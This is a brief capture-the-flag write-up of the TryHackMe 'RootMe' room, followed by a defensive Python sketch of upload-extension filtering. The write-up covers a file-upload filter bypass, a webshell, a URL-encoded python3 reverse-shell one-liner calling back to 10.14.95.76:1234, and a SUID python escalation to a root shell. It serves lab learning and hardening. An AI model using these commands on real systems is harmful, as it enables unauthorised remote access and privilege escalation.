[thm] RootMe
information
Port scan
panel
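Changing the file extension was enough to get the upload through, but the reverse shell would not work, possibly because of the PHP version, so I uploaded a one-line webshell instead.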
user1
python3%20-c%20'import%20os,pty,socket;s=socket.socket();s.connect(("10.14.95.76",1234));[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn("sh")'
Switching to a python3 reverse shell got the user.
root
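./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
There's a python, oh there's a python!
conclusion
- After reading the upload code: the intended route is to bypass the filter with an extension such as php5, so phtml does not work.
- Don't limit yourself to a single approach.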
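The first conclusion point comes down to an upload filter that denylists extensions. The sketch below is an added example, not the room's upload code: it models such a check next to an allowlist replacement. The denylist contents, the handler-extension set and all function names are assumptions chosen to match the note above.

```python
import os
import secrets

# Assumption: extensions a PHP-enabled web server may hand to the interpreter.
PHP_HANDLER_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}
# Assumption: a denylist consistent with the note above (phtml blocked, php5 not).
DENYLIST = {".php", ".phtml"}
# Hardened policy: only the types the feature actually needs.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}

def denylist_accepts(filename):
    """Weak check: reject only the extensions someone thought to list."""
    ext = os.path.splitext(filename.lower())[1]
    return ext not in DENYLIST

def allowlist_accepts(filename):
    """Strict check: one known-good extension, no extra dots in the stem."""
    name = os.path.basename(filename).lower()
    stem, ext = os.path.splitext(name)
    # An empty stem covers dotfiles; a dot in the stem covers "x.php.png".
    return bool(stem) and "." not in stem and ext in ALLOWLIST

def denylist_gaps(filenames):
    """Names the weak check lets through that the server could still execute."""
    return [n for n in filenames
            if denylist_accepts(n)
            and os.path.splitext(n.lower())[1] in PHP_HANDLER_EXTS]

def safe_stored_name(filename):
    """Return a server-chosen name for an accepted upload, else None."""
    if not allowlist_accepts(filename):
        return None
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext  # the client's name never reaches disk

if __name__ == "__main__":
    # Constructed sample names, not taken from the target.
    samples = ["avatar.PNG", "x.php", "x.phtml", "x.php5", "x.phar", "x.php.png"]
    print("denylist gaps:", denylist_gaps(samples))
    for s in samples:
        print(f"{s:12} denylist={denylist_accepts(s)} allowlist={allowlist_accepts(s)}")
```

Storing uploads outside the web root, or in a directory where the PHP handler is disabled, removes the execution path even if a filename check is bypassed.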
This post is licensed under CC BY 4.0 by the author.